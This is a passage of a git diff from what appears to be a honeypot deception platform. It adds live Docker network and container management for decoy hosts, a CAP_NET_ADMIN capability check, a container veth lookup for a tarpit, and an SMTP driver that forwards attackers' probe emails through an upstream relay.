ignore[attr-defined] - record.otel_span_id = "0" # type: ignore[attr-defined] + record.otel_trace_id = "0" + 
record.otel_span_id = "0" return True diff --git a/decnet/mutator/engine.py b/decnet/mutator/engine.py index 2e533897..d0de3951 100644 --- a/decnet/mutator/engine.py +++ b/decnet/mutator/engine.py @@ -289,13 +289,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int: return 0 drained = 0 for topo in pending: - tid = topo["id"] + tid = topo.id try: await _deployer.resync_agent_topology(repo, tid) await repo.set_topology_resync(tid, False) drained += 1 log.info("topology %s resynced to agent %s", - tid, topo.get("target_host_uuid")) + tid, topo.target_host_uuid) except Exception as exc: # noqa: BLE001 log.warning( "topology %s resync failed (will retry): %s", tid, exc, diff --git a/decnet/mutator/ops.py b/decnet/mutator/ops.py index 245bc94a..2ec8f18a 100644 --- a/decnet/mutator/ops.py +++ b/decnet/mutator/ops.py @@ -98,6 +98,463 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]: ) +async def _materialise_lan_change( + repo: Any, + topology_id: str, + *, + created: Optional[tuple[str, str, bool]] = None, + removed: Optional[str] = None, +) -> None: + """Create or remove the docker bridge for a live LAN op + re-render compose. + + Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB + write lands. Skips when: + + * the topology is not active/degraded (a pending topology gets its + networks created at deploy time), + * the topology is pinned to a swarm agent (cross-host materialisation + isn't implemented; the agent's apply_topology RPC re-renders the + whole compose at next push), + * the docker SDK / networking primitive raises (logged, not + re-raised — the DB row is the source of truth). 
+ """ + topology = await repo.get_topology(topology_id) + if topology is None: + return + status = topology.status + if status not in ("active", "degraded"): + return + if topology.target_host_uuid: + _log.info( + "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile", + topology_id, + ) + return + + # Lazy imports — these pull in docker.py / network.py which both + # require the docker SDK; keeping them out of module-import keeps + # the mutator usable in test environments that stub docker. + import docker + from decnet.engine.deployer import _topology_compose_path + from decnet.network import create_bridge_network, remove_bridge_network + from decnet.topology.compose import _network_name, write_topology_compose + + client = docker.from_env() + try: + if created is not None: + name, subnet, is_dmz = created + net_name = _network_name(topology_id, name) + try: + create_bridge_network( + client, net_name, subnet, internal=not is_dmz, + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s", + topology_id, name, subnet, exc, + ) + # Don't re-raise — the DB row is the source of truth. + # Operator can retry by removing + re-adding the LAN. + if removed is not None: + net_name = _network_name(topology_id, removed) + try: + remove_bridge_network(client, net_name) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live remove_lan: bridge remove failed topology=%s lan=%s: %s", + topology_id, removed, exc, + ) + + # Re-render compose so the file on disk matches the DB. Even + # when the bridge create above failed, a future redeploy will + # try to bring the network back from the compose definition. 
+ hydrated = await hydrate(repo, topology_id) + if hydrated is not None: + try: + write_topology_compose( + hydrated, _topology_compose_path(topology_id), + ) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live LAN op: compose re-render failed topology=%s: %s", + topology_id, exc, + ) + except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure + _log.error( + "live LAN materialisation crashed topology=%s: %s", + topology_id, exc, + ) + + +def _is_buildx_wedge(exc: BaseException) -> bool: + """True when *exc* looks like the buildx EROFS wedge. + + We consult both the structured CalledProcessError.stderr and the + str(exc) form because ``_compose_with_retry`` raises a synthetic + CalledProcessError whose ``stderr`` contains the recovery hint + (which preserves the wedge signatures verbatim). + """ + from decnet.engine.deployer import ( + _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE, + ) + stderr = "" + if hasattr(exc, "stderr") and exc.stderr: + stderr = str(exc.stderr) + haystack = (stderr + " " + str(exc)).lower() + return ( + _BUILDX_WEDGE_SIGNATURE in haystack + and _BUILDX_EROFS_SIGNATURE in haystack + ) + + +async def _compose_up_with_buildkit_fallback( + *args: str, compose_file, label: str, +) -> None: + """Run ``compose up`` and auto-fall-back to the legacy builder on wedge. + + The buildx activity dir occasionally lands on a read-only mount — + happens enough on operator dev boxes that we don't want a single + wedge to abort a live decky-add. When _compose_with_retry raises + with the EROFS-wedge signatures, we retry once with + ``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't + use the activity dir and isn't affected. + + *label* is a human-readable identifier used only in log lines so an + operator can grep the fall-back back to the originating op. 
+ """ + import anyio + from decnet.engine.deployer import _compose_with_retry + try: + await anyio.to_thread.run_sync( + lambda: _compose_with_retry(*args, compose_file=compose_file), + ) + return + except Exception as exc: # noqa: BLE001 + if not _is_buildx_wedge(exc): + raise + _log.warning( + "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 " + "(legacy builder). Recover the buildx state at your leisure: " + "rm -rf ~/.docker/buildx/activity && " + "docker buildx create --name decnet-builder --use --bootstrap", + label, + ) + # Outside the except so the second attempt's traceback isn't + # nested under the first failure if it also blows up. + await anyio.to_thread.run_sync( + lambda: _compose_with_retry( + *args, compose_file=compose_file, + env={"DOCKER_BUILDKIT": "0"}, + ), + ) + + +def _decky_targets(decky_name: str, services: list[str]) -> list[str]: + """Compose service names for one decky: base + each per-decky service. + + Skips ``fleet_singleton`` services — those run once fleet-wide and + don't have a per-decky compose entry. Mirrors the same filter + applied at compose-render time + (:mod:`decnet.topology.compose.generate_topology_compose`). + """ + from decnet.services.registry import get_service + targets = [decky_name] + for svc_name in services: + try: + svc = get_service(svc_name) + except KeyError: + # Unknown service — leave it; the compose render won't emit + # a fragment for it, so compose up will simply ignore the + # name with a clear "no such service" error. Surface that + # rather than silently dropping it. + targets.append(f"{decky_name}-{svc_name}") + continue + if svc.fleet_singleton: + continue + targets.append(f"{decky_name}-{svc_name}") + return targets + + +async def _live_topology_or_none( + repo: Any, topology_id: str, +) -> Optional[dict[str, Any]]: + """Return the topology row only when it's eligible for live materialisation. 
+ + Returns None (so callers can skip with a single ``if`` check) when: + + * the topology doesn't exist; + * status is not ``active`` or ``degraded`` (pending topologies get + everything materialised at deploy time); + * the topology is pinned to a swarm agent (cross-host live editing + is its own routing workstream). + """ + topology = await repo.get_topology(topology_id) + if topology is None: + return None + if topology.status not in ("active", "degraded"): + return None + if topology.target_host_uuid: + _log.info( + "live decky op skipped (agent-pinned topology=%s); " + "next agent push will reconcile", + topology_id, + ) + return None + return topology + + +async def _rerender_compose(repo: Any, topology_id: str) -> None: + """Re-render the per-topology compose file from the current DB. + + Called after each materialisation step so the file on disk matches + the topology rows. Soft-fails: a render error is logged but + doesn't poison the DB-side mutation. + """ + from decnet.engine.deployer import _topology_compose_path + from decnet.topology.compose import write_topology_compose + hydrated = await hydrate(repo, topology_id) + if hydrated is None: + return + try: + write_topology_compose(hydrated, _topology_compose_path(topology_id)) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live op: compose re-render failed topology=%s: %s", + topology_id, exc, + ) + + +async def _materialise_decky_spawn( + repo: Any, topology_id: str, decky_name: str, services: list[str], +) -> bool: + """compose up -d --no-deps --build for one decky (base + services). + + Re-renders compose first so the file lists the new decky. Returns + True when compose-up reported success, False otherwise (or when + the topology isn't eligible for live materialisation — pending + topologies skip and return False so the caller doesn't flip the + state to ``running`` based on a no-op). Best-effort: docker + failure is logged, not re-raised — DB row is the source of truth. 
+ """ + if await _live_topology_or_none(repo, topology_id) is None: + return False + from decnet.engine.deployer import _topology_compose_path + await _rerender_compose(repo, topology_id) + targets = _decky_targets(decky_name, services) + compose_path = _topology_compose_path(topology_id) + try: + await _compose_up_with_buildkit_fallback( + "up", "-d", "--no-deps", "--build", *targets, + compose_file=compose_path, + label=f"live add_decky topology={topology_id} decky={decky_name}", + ) + return True + except Exception as exc: # noqa: BLE001 + _log.error( + "live add_decky: compose up failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + return False + + +async def _materialise_decky_remove( + repo: Any, topology_id: str, decky_name: str, services: list[str], +) -> None: + """compose stop + rm -f for one decky's containers, then re-render.""" + if await _live_topology_or_none(repo, topology_id) is None: + return + import anyio + from decnet.engine.deployer import _compose, _topology_compose_path + + targets = _decky_targets(decky_name, services) + compose_path = _topology_compose_path(topology_id) + # Stop + rm BEFORE re-rendering compose; the re-rendered file no + # longer mentions the decky, so a stop run AFTER rendering would + # find no service to act on. 
+ try: + await anyio.to_thread.run_sync( + lambda: _compose("stop", *targets, compose_file=compose_path), + ) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live remove_decky: compose stop failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + try: + await anyio.to_thread.run_sync( + lambda: _compose("rm", "-f", *targets, compose_file=compose_path), + ) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live remove_decky: compose rm failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + await _rerender_compose(repo, topology_id) + + +async def _materialise_decky_connect( + repo: Any, topology_id: str, + decky_name: str, lan_name: str, ipv4_address: str, +) -> None: + """SDK ``network.connect`` to multi-home a running base container. + + Service containers share the base's netns via ``network_mode: + service:`` (see :mod:`decnet.topology.compose`), so attaching + the base alone gives every service container the new interface for + free — we don't need to iterate. + """ + if await _live_topology_or_none(repo, topology_id) is None: + return + import docker + from decnet.topology.compose import _container_name, _network_name + + net_name = _network_name(topology_id, lan_name) + container_name = _container_name(topology_id, decky_name) + try: + client = docker.from_env() + net = client.networks.get(net_name) + container = client.containers.get(container_name) + net.connect(container, ipv4_address=ipv4_address) + except docker.errors.APIError as exc: + # Idempotency — already on the network is fine. 
+ msg = str(exc).lower() + if "already" in msg or "endpoint" in msg and "exists" in msg: + _log.info( + "live attach_decky: %s already on network %s — skipping", + container_name, net_name, + ) + else: + _log.error( + "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s", + topology_id, decky_name, lan_name, exc, + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s", + topology_id, decky_name, lan_name, exc, + ) + await _rerender_compose(repo, topology_id) + + +async def _materialise_decky_disconnect( + repo: Any, topology_id: str, decky_name: str, lan_name: str, +) -> None: + """SDK ``network.disconnect`` to drop a multi-home edge.""" + if await _live_topology_or_none(repo, topology_id) is None: + return + import docker + from decnet.topology.compose import _container_name, _network_name + + net_name = _network_name(topology_id, lan_name) + container_name = _container_name(topology_id, decky_name) + try: + client = docker.from_env() + net = client.networks.get(net_name) + container = client.containers.get(container_name) + net.disconnect(container) + except docker.errors.APIError as exc: + msg = str(exc).lower() + if "not connected" in msg or "no such" in msg: + _log.info( + "live detach_decky: %s already off network %s — skipping", + container_name, net_name, + ) + else: + _log.error( + "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s", + topology_id, decky_name, lan_name, exc, + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s", + topology_id, decky_name, lan_name, exc, + ) + await _rerender_compose(repo, topology_id) + + +async def _materialise_decky_services_diff( + repo: Any, topology_id: str, + decky_name: str, + added: list[str], + removed: list[str], +) -> None: + """Add/remove per-service containers without touching siblings. 
+ + Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but + without coupling the mutator to that module — service mutations + routed via the mutator queue publish ``mutation.applied`` while the + direct API publishes ``decky..service_added``; they share + machinery, not control flow. + """ + if not added and not removed: + return + if await _live_topology_or_none(repo, topology_id) is None: + return + import anyio + from decnet.engine.deployer import _compose, _topology_compose_path + + await _rerender_compose(repo, topology_id) + compose_path = _topology_compose_path(topology_id) + add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base + if add_targets: + try: + await _compose_up_with_buildkit_fallback( + "up", "-d", "--no-deps", "--build", *add_targets, + compose_file=compose_path, + label=f"live update_decky add topology={topology_id} decky={decky_name}", + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live update_decky add: compose up failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + rm_targets = _decky_targets(decky_name, list(removed))[1:] + for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))): + if not rm_targets: + break + try: + await anyio.to_thread.run_sync( + lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc] + ) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live update_decky %s failed topology=%s decky=%s: %s", + action_name, topology_id, decky_name, exc, + ) + + +async def _materialise_decky_recreate_base( + repo: Any, topology_id: str, decky_name: str, +) -> None: + """Force-recreate just the base container (used for forwards_l3 flips). + + DESTRUCTIVE: kills any in-container state on the base. Service + containers re-attach via ``network_mode: service:`` after the + base is rebuilt. Caller is responsible for gating this on an + explicit operator-supplied ``force=true`` flag. 
+ """ + if await _live_topology_or_none(repo, topology_id) is None: + return + import anyio + from decnet.engine.deployer import ( + _compose_with_retry, _topology_compose_path, + ) + await _rerender_compose(repo, topology_id) + compose_path = _topology_compose_path(topology_id) + try: + await anyio.to_thread.run_sync( + lambda: _compose_with_retry( + "up", "-d", "--no-deps", "--force-recreate", decky_name, + compose_file=compose_path, + ), + ) + except Exception as exc: # noqa: BLE001 + _log.error( + "live update_decky recreate_base failed topology=%s decky=%s: %s", + topology_id, decky_name, exc, + ) + + # ------------------------------------------------------------------- ops @@ -131,6 +588,16 @@ async def apply_add_lan( "y": payload.get("y"), } ) + + # Live materialisation: when the topology is active/degraded, create + # the docker bridge network now and re-render the per-topology + # compose file so subsequent ``apply_add_decky`` writes a coherent + # services map. Pending topologies skip this — the next deploy + # creates everything from scratch. Agent-pinned topologies also + # skip; live editing on agents is its own routing problem. + await _materialise_lan_change( + repo, topology_id, created=(name, subnet, is_dmz), + ) await _assert_valid_after(repo, topology_id) @@ -150,7 +617,17 @@ async def apply_remove_lan( f"LAN {lan['name']!r} is the home LAN of decky " f"{d['decky_config']['name']!r}; remove the decky first" ) - await repo.delete_lan(lan["id"]) + lan_name = lan["name"] + # enforce_pending=False: the mutator queue is the live-editing + # surface, gated on topology status by us before we got here. The + # repo's pending-only guard is for HTTP CRUD callers that mustn't + # bypass it. + await repo.delete_lan(lan["id"], enforce_pending=False) + + # Live materialisation symmetric to apply_add_lan: tear down the + # docker bridge and re-render compose so a future redeploy doesn't + # try to wire deckies into a network that no longer exists. 
+ await _materialise_lan_change(repo, topology_id, removed=lan_name) await _assert_valid_after(repo, topology_id) @@ -204,11 +681,12 @@ async def apply_add_decky( if forwards_l3: decky_config["forwards_l3"] = True + services_list = list(payload.get("services", [])) decky_uuid = await repo.add_topology_decky( { "topology_id": topology_id, "name": name, - "services": list(payload.get("services", [])), + "services": services_list, "decky_config": decky_config, "x": payload.get("x"), "y": payload.get("y"), @@ -223,6 +701,25 @@ async def apply_add_decky( "forwards_l3": forwards_l3, } ) + # Live materialisation: spawn the new decky's containers without + # touching siblings. Skips on pending / agent-pinned topologies — + # see _live_topology_or_none. + spawned = await _materialise_decky_spawn( + repo, topology_id, name, services_list, + ) + # Flip the row's state to 'running' on success so the dashboard's + # ACTIVE DECKIES count reflects reality. Without this the row + # stays at the default 'pending' forever; the deployer's full + # post-deploy reconcile only runs on a fresh deploy_topology. + if spawned: + try: + await repo.update_topology_decky(decky_uuid, {"state": "running"}) + except Exception as exc: # noqa: BLE001 + _log.warning( + "live add_decky: state flip to running failed " + "topology=%s decky=%s: %s", + topology_id, name, exc, + ) await _assert_valid_after(repo, topology_id) @@ -286,6 +783,16 @@ async def apply_attach_decky( "forwards_l3": forwards_l3, } ) + # Live materialisation: SDK network.connect on the base container. + # Service containers share the base's netns via network_mode: + # service:, so they inherit the new interface — only the base + # needs the connect. 
+ await _materialise_decky_connect( + repo, topology_id, + decky_name=decky["decky_config"]["name"], + lan_name=lan["name"], + ipv4_address=ip, + ) await _assert_valid_after(repo, topology_id) @@ -329,7 +836,15 @@ async def apply_detach_decky( await repo.update_topology_decky( decky["uuid"], {"decky_config": new_cfg} ) - await repo.delete_topology_edge(edge["id"]) + await repo.delete_topology_edge(edge["id"], enforce_pending=False) + # Live materialisation: SDK network.disconnect on the base + # container. Service containers automatically lose visibility into + # the LAN because they share the base's netns. + await _materialise_decky_disconnect( + repo, topology_id, + decky_name=decky["decky_config"]["name"], + lan_name=lan["name"], + ) await _assert_valid_after(repo, topology_id) @@ -340,7 +855,15 @@ async def apply_remove_decky( decky = _decky_by_name(hydrated, payload["decky"]) if decky is None: raise MutationError(f"decky {payload['decky']!r} not found") - await repo.delete_topology_decky(decky["uuid"]) + decky_name = decky["decky_config"]["name"] + services_list = list(decky.get("services") or []) + await repo.delete_topology_decky(decky["uuid"], enforce_pending=False) + # Live materialisation: stop + rm -f the decky's containers. We + # capture decky_name + services BEFORE the delete so the helper + # has the targets even though the row is gone. + await _materialise_decky_remove( + repo, topology_id, decky_name, services_list, + ) await _assert_valid_after(repo, topology_id) @@ -354,31 +877,136 @@ async def apply_update_decky( ``patch`` — dict merged into existing ``decky_config``. ``services`` — replacement top-level services list. ``x``,``y`` — layout coords. + ``force`` — opt-in for destructive recreates (currently + required when ``forwards_l3`` flips on a + live topology — see below). + + Live materialisation strategy: + + * **services changed** → diff old vs new; ``compose up -d`` for + added, ``compose stop`` + ``rm -f`` for removed. 
Mirrors the + direct API path (services_live) without coupling. + * **forwards_l3 flipped** → port publishing changes, which docker + can only apply at container-create time. Requires recreating + the base — destructive (kills in-container state, drops active + sessions). Gated on ``payload['force'] is True``; otherwise we + raise ``MutationError`` so a half-thinking operator doesn't + stomp a live decky. + * **only coords (x/y)** → DB-only. No docker work. """ hydrated = await _hydrated(repo, topology_id) decky = _decky_by_name(hydrated, payload["decky"]) if decky is None: raise MutationError(f"decky {payload['decky']!r} not found") + + # Capture pre-state so we can compute the diff after the DB write. + old_services = list(decky.get("services") or []) + old_cfg = decky.get("decky_config") or {} + old_forwards_l3 = bool(old_cfg.get("forwards_l3", False)) + patch: dict[str, Any] = {} + new_decky_config = old_cfg if payload.get("patch"): - merged = dict(decky["decky_config"]) - merged.update(payload["patch"]) - patch["decky_config"] = merged + new_decky_config = {**old_cfg, **payload["patch"]} + patch["decky_config"] = new_decky_config + new_services = old_services if "services" in payload: - patch["services"] = list(payload["services"]) + new_services = list(payload["services"]) + patch["services"] = new_services for key in ("x", "y"): if key in payload: patch[key] = payload[key] if not patch: return + + new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False)) + forwards_l3_flipped = new_forwards_l3 != old_forwards_l3 + + # Promotion path: refuse to flip a non-DMZ decky to gateway. The + # 'gateway' semantic specifically means 'host-port publisher facing + # the DMZ' — running it on an internal LAN publishes ports the + # outside world can't reach and shadows the host's port space. 
+ # Generic L3-bridge forwards_l3 (internal multi-homing) is set by + # the generator/attach paths, not by this op, so this check only + # fires when the operator explicitly toggles the flag. + if forwards_l3_flipped and new_forwards_l3: + # Re-derive the home LAN from the edges; same logic as + # check_gateway_homed_in_dmz. + decky_uuid = decky["uuid"] + home_lan_id: Optional[str] = None + for e in hydrated["edges"]: + if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False: + home_lan_id = e["lan_id"] + break + if home_lan_id is None: + for e in hydrated["edges"]: + if e["decky_uuid"] == decky_uuid: + home_lan_id = e["lan_id"] + break + home_lan = next( + (lan for lan in hydrated["lans"] if lan["id"] == home_lan_id), + None, + ) + if home_lan is None or not home_lan.get("is_dmz"): + home_name = home_lan["name"] if home_lan else "(unknown)" + raise MutationError( + f"cannot promote decky {decky['decky_config']['name']!r} " + f"to gateway: home LAN {home_name!r} is not a DMZ. " + "Move the decky to the DMZ first, or pick a different decky." + ) + + # Pre-check the destructive flip BEFORE any DB write, so a refused + # mutation leaves zero side-effects. + is_live = (await _live_topology_or_none(repo, topology_id)) is not None + if is_live and forwards_l3_flipped and not bool(payload.get("force")): + raise MutationError( + f"forwards_l3 flip on live decky " + f"{decky['decky_config']['name']!r} requires force=true; " + "this will recreate the base container and drop in-container state" + ) + await repo.update_topology_decky(decky["uuid"], patch) + + # Materialisation — only when the topology is actually live. + # _live_topology_or_none was already called above; calling the + # individual helpers re-checks (cheap) so they stay self-contained. 
+ decky_name = decky["decky_config"]["name"] + added = sorted(set(new_services) - set(old_services)) + removed = sorted(set(old_services) - set(new_services)) + if added or removed: + await _materialise_decky_services_diff( + repo, topology_id, decky_name, added, removed, + ) + if forwards_l3_flipped: + # force was checked above; reaching here means the operator + # opted in. recreate_base re-renders compose first so the + # rebuilt base picks up the new `ports:` block. + await _materialise_decky_recreate_base( + repo, topology_id, decky_name, + ) + await _assert_valid_after(repo, topology_id) async def apply_update_lan( repo: Any, topology_id: str, payload: dict[str, Any] ) -> None: - """Update LAN fields — subnet, is_dmz, coords, rename.""" + """Update LAN fields — subnet, is_dmz, coords, rename. + + Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time. + Live deckies bind to the bridge with IPs allocated from the old + subnet (and ``is_dmz`` flips swap the bridge's ``internal=False`` + flag, which docker can't change on a network with active + containers). Reject those mutations on active/degraded topologies + rather than rewriting the DB into an incoherent state. + + Coord-only updates (``x``/``y``) are layout-only; let them through + unconditionally. Renames pass through too — the bridge's docker + name is keyed off ``_network_name(topology_id, lan_name)``, so a + rename would also need a rebuild — but rename isn't currently a + code path on active topologies; if the operator hits it we still + write the row and let the next deploy reconcile. 
+ """ hydrated = await _hydrated(repo, topology_id) lan = _lan_by_name(hydrated, payload["name"]) if lan is None: @@ -389,6 +1017,17 @@ async def apply_update_lan( fields[key] = payload[key] if not fields: return + + topology = await repo.get_topology(topology_id) + is_live = bool(topology) and topology.status in ("active", "degraded") + if is_live: + hostile = {"subnet", "is_dmz"} & fields.keys() + if hostile: + raise MutationError( + f"cannot change {sorted(hostile)} on a deployed LAN; " + f"teardown + redeploy required" + ) + await repo.update_lan(lan["id"], fields) await _assert_valid_after(repo, topology_id) diff --git a/decnet/network.py b/decnet/network.py index c150071e..5eaa7474 100644 --- a/decnet/network.py +++ b/decnet/network.py @@ -303,11 +303,44 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None: # Host-side macvlan interface (hairpin fix) # --------------------------------------------------------------------------- -def _require_root() -> None: - if os.geteuid() != 0: - raise PermissionError( - "MACVLAN host-side interface setup requires root. Run with sudo." - ) +# Linux capability bit positions — see capabilities(7). +_CAP_NET_ADMIN = 12 + + +def _has_cap_net_admin() -> bool: + """True if the current process holds CAP_NET_ADMIN in its effective set. + + Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we + don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask; + bit 12 is CAP_NET_ADMIN. + """ + try: + with open("/proc/self/status", "r") as fh: + for line in fh: + if line.startswith("CapEff:"): + bits = int(line.split()[1], 16) + return bool(bits & (1 << _CAP_NET_ADMIN)) + except OSError: + pass + return False + + +def _require_net_admin() -> None: + """Reject early if the process can't run ``ip link add ... macvlan``. + + CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK + of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap) + but not necessary. 
Prefer the cap check so the systemd unit's + ``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the + whole API to run as root. + """ + if os.geteuid() == 0 or _has_cap_net_admin(): + return + raise PermissionError( + "MACVLAN host-side interface setup needs CAP_NET_ADMIN. " + "Either run as root or grant the cap (systemd: " + "AmbientCapabilities=CAP_NET_ADMIN)." + ) def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None: @@ -317,7 +350,9 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str host-helper first: the two drivers can share a parent NIC on paper but leaving the opposite helper in place is just cruft after a driver swap. """ - _require_root() + _require_net_admin() + + _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) @@ -332,7 +367,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str def teardown_host_macvlan(decky_ip_range: str) -> None: - _require_root() + _require_net_admin() _run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) @@ -344,7 +379,9 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str) host-helper first so a prior macvlan deploy doesn't leave its slave dangling on the parent NIC after the driver swap. 
""" - _require_root() + _require_net_admin() + + _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False) @@ -358,7 +395,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str) def teardown_host_ipvlan(decky_ip_range: str) -> None: - _require_root() + _require_net_admin() _run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False) _run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False) @@ -378,3 +415,47 @@ def ips_to_range(ips: list[str]) -> str: strict=False, ) return str(network) + + +# --------------------------------------------------------------------------- +# Container veth resolution (for tc netem tarpit) +# --------------------------------------------------------------------------- + +def get_container_pid(container_name: str) -> int: + """Return the PID of a running container's init process.""" + client = docker.from_env() + try: + container = client.containers.get(container_name) + except docker.errors.NotFound: + raise LookupError(f"container {container_name!r} not found") + pid = container.attrs["State"]["Pid"] + if not pid: + raise LookupError(f"container {container_name!r} is not running (PID=0)") + return pid + + +def get_container_veth(container_name: str) -> str: + """Return the host veth interface name paired to container_name's eth0. + + Reads /sys/class/net/eth0/iflink from inside the container to get the + peer interface index, then matches it against ``ip link show`` on the host. + Requires no nsenter and no elevated privileges beyond what Docker exec grants. 
+ """ + result = _run( + ["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"], + check=False, + ) + if result.returncode != 0: + raise LookupError( + f"container {container_name!r} not reachable: {result.stderr.strip()}" + ) + peer_index = result.stdout.strip() + links = _run(["ip", "link", "show"]) + for line in links.stdout.splitlines(): + if line.startswith(f"{peer_index}:"): + # Format: "42: veth3a4b5c@if41: " + iface = line.split(":")[1].strip().split("@")[0] + return iface + raise LookupError( + f"no host veth found for container {container_name!r} (peer ifindex {peer_index})" + ) diff --git a/decnet/orchestrator/drivers/smtp_relay.py b/decnet/orchestrator/drivers/smtp_relay.py new file mode 100644 index 00000000..4c1be0df --- /dev/null +++ b/decnet/orchestrator/drivers/smtp_relay.py @@ -0,0 +1,80 @@ +"""SMTP probe-relay driver. + +Forwards the attacker's first probe email via the master's real internet +connection. The smtp_relay decky runs on MACVLAN and has no gateway access; +the master (where this worker runs) does. + +Called by the realism worker's smtp probe listener, not the main tick loop. +""" +from __future__ import annotations + +import email +import smtplib +from pathlib import Path +from typing import Any + +_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts" + + +def _ensure_from_header(body: bytes, mail_from: str) -> bytes: + """Return body with a From: header added if one is absent.""" + try: + msg = email.message_from_bytes(body) + except Exception: + return body + if msg["From"]: + return body + # Prepend the header before the existing content. + header_line = f"From: {mail_from}\r\n".encode() + return header_line + body + + +def forward_probe( + *, + svc_cfg: dict[str, Any], + stored_as: str, + decky_name: str, + mail_from: str, + rcpt_to: list[str], + artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT, +) -> tuple[bool, str]: + """Read the .eml from disk and forward it via the upstream relay. 
+ + Returns (True, "") on success or (False, reason) on failure. + Always safe to call in a thread — uses only blocking I/O. + """ + upstream_host = (svc_cfg.get("upstream_host") or "").strip() + if not upstream_host: + return False, "upstream_host not configured" + + eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as + try: + body = eml_path.read_bytes() + except OSError as exc: + return False, f"cannot read eml: {exc}" + + if not rcpt_to: + return False, "no recipients" + + upstream_port = int(svc_cfg.get("upstream_port") or 25) + upstream_user = (svc_cfg.get("upstream_user") or "").strip() + upstream_pass = (svc_cfg.get("upstream_pass") or "").strip() + envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from + + # Ensure the message has a From: header so mail clients show the attacker's + # address rather than falling back to the envelope sender (upstream_sender). + # Minimal relay-test scripts often omit headers entirely. + body = _ensure_from_header(body, mail_from) + + try: + with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn: + conn.ehlo() + if conn.has_extn("STARTTLS"): + conn.starttls() + conn.ehlo() + if upstream_user and upstream_pass: + conn.login(upstream_user, upstream_pass) + conn.sendmail(envelope_from, rcpt_to, body) + return True, "" + except Exception as exc: + return False, str(exc)[:256] diff --git a/decnet/orchestrator/drivers/ssh.py b/decnet/orchestrator/drivers/ssh.py index 9718028e..15335a97 100644 --- a/decnet/orchestrator/drivers/ssh.py +++ b/decnet/orchestrator/drivers/ssh.py @@ -18,11 +18,8 @@ or IP can't escape into a shell. 
from __future__ import annotations import asyncio -import shlex from typing import Any - -import base64 -from datetime import datetime, timezone +from datetime import datetime from decnet.logging import get_logger from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult @@ -226,36 +223,24 @@ class SSHDriver(ActivityDriver): ) -> ActivityResult: """Write *content* to *path* inside *decky_name*'s ssh container. - Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s - ARG_MAX-safe write — see commit c17b9e0). Sets file mode and, - when *mtime* is provided, ``touch -d`` to backdate the file so - it doesn't all stamp at wall-clock-now (the realism failure - this migration is fixing). + Delegates to :func:`decnet.decky_io.write_file_to_container`, + which carries the ARG_MAX-safe base64-via-stdin trick. Sets + file mode and, when *mtime* is provided, ``touch -d`` to + backdate the file (otherwise everything stamps at wall-clock-now + — the realism failure this path was originally fixing). """ + from decnet.decky_io import write_file_to_container + container = _container_for(decky_name) - b64 = base64.b64encode(content).decode("ascii") - # touch -d accepts ISO 8601; we always emit UTC so the - # container's local TZ doesn't drift the mtime. 
